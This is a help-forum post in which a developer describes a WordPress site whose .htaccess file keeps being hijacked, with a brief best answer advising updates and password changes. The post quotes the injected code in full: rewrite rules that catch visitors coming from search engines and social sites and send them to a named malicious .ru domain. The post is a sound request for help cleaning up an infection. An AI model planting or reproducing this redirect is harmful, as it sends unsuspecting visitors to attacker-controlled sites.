I'm stumped. My clients wordpress site keeps having its .htaccess file hacked. It's adding code to redirect all traffic from search engines to different sites. It keeps changing the domain it's redirecting to. Currently (don't visit this site! prime-vermond.ru)
I have changed ftp passwords, wordpress admin passwords, updated all plugins, removed unused plugins, changed file permissions of .htaccess file to 444.
I'm thinking it might be a server exploit? The clients site is hosted with godaddy. I emailed them several times, waiting for a response on my latest support ticket.
I have run a search of all files looking for what might have malicious code in it but came up with nothing. I'm assuming they have the code base64 encoded and are using eval to run it.
Any ideas on how to better find a modified bad file? I'm at a loss now =/
Below is the entire code being added to the .htaccess file
ErrorDocument 400 http://prime-vermond.ru/trast/index.php
ErrorDocument 401 http://prime-vermond.ru/trast/index.php
ErrorDocument 403 http://prime-vermond.ru/trast/index.php
ErrorDocument 404 http://prime-vermond.ru/trast/index.php
ErrorDocument 500 http://prime-vermond.ru/trast/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://prime-vermond.ru/trast/index.php [R=301,L]
Best Answer
Either your application code is being exploited or someone has phished/guessed your account credentials. Make sure your wp code is up to date, including any plugins, and make sure you change your account password.